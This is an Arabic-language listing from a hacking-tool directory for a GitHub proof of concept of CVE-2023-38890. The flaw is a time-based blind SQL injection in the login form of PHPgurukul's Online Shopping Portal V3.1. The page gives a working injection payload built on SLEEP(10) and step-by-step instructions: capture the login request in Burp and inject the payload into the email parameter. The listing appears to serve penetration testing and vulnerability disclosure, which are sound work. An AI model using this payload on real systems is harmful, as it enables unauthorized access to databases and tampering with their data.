Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/akshadjoshi/cve-2023-38890
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubakshadjoshi/cve-2023-38890

CVE-2023-38890

poc

عرض المستودع
2منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38890

وصف

مشروع بوابة التسوق عبر الإنترنت V3.1 يسمح للمهاجمين عن بُعد بتنفيذ استعلامات SQL تعسفية عبر نموذج تسجيل الدخول، مما يؤدي إلى وصول غير مصرح به واحتمال التلاعب بالبيانات. ينشأ هذا الثغرة بسبب عدم كفاية التحقق من صحة الإدخال المقدم من المستخدم في حقل اسم المستخدم، مما يتيح هجمات حقن SQL.


عنوان الثغرة: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli

مؤلف الثغرة: Akshad Joshi

الصفحة الرئيسية للبائع: https://phpgurukul.com

رابط البرنامج: https://phpgurukul.com/shopping-portal-free-download/

تم الاختبار على: Linux

خطوات إعادة الإنتاج

استخدم هذا الحمولة (قم بتشفير عنوان URL):

root@kitploit:~
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH
  1. قم بزيارة-http://localhost/shopping/login.php
  2. قم بتسجيل الدخول باستخدام الحساب الذي أنشأته.
  3. يوجد تحقق في الواجهة الأمامية لذا قم بالتقاط الطلب في Burp.
  4. قم بتمرير الحمولة أعلاه في معامل البريد الإلكتروني ولاحظ وقت الاستجابة.
تنزيل الأداة